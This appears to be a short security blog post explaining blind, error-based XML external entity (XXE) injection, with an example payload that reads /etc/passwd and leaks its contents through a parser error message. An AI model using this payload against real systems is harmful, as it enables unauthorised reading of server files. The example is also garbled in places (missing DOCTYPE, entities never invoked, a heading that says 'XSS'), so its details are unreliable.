Blind Error-Based XXE

What is Blind XXE?
When an application is vulnerable to the XXE attacks but the server doesn't provide any information via HTTP response, it is called blind XXE. In blind XXE, an attacker can not retrieve the desired information directly, it would be harder to exploit. But still, an attacker can use some tricks to get the information via blind XXE. One way of exploiting is Out of Band XXE as explained in the previous blog.

What is Error Based XXE?
As explained earlier, blind XXE does not allow an attacker to get the information via HTTP response, an attacker can trigger the error to get the desired information via error message. This technique is called Error Based XXE. 

Let's understand XXE with a basic example. Please assume that an application of a college is having a filter option and the following XML file is used as an input to an insecure parser:

<?xml version="1.0" encoding="UTF-8"?> 

If server is parsing this file insecurly on server-side, an attacker can provide following payload to exploit the Error Based XXE:

<?xml version="1.0" encoding="UTF-8"?> 
<!ENTITY % SecretFile SYSTEM "file:///etc/passwd">
<!ENTITY % semester "<!ENTITY &#x25; branch SYSTEM 'file:///invalid_path/%SecretFile;'>">

In the above example, when semester entity is resolved by the XML parser, it will load the SecretFile (passwd file) in the branch entity. Now when branch variable is resolved, it will try to get the contents of file "file:///invalid_path/contents_of_secret_file" and it will generate the error of file not found as shown below: /invalid_path/root:x:0:0:root:/root:/bin/bash

How to prevent XSS?

A developer can use a proper error and exception handling to prevent any error based vulnerability.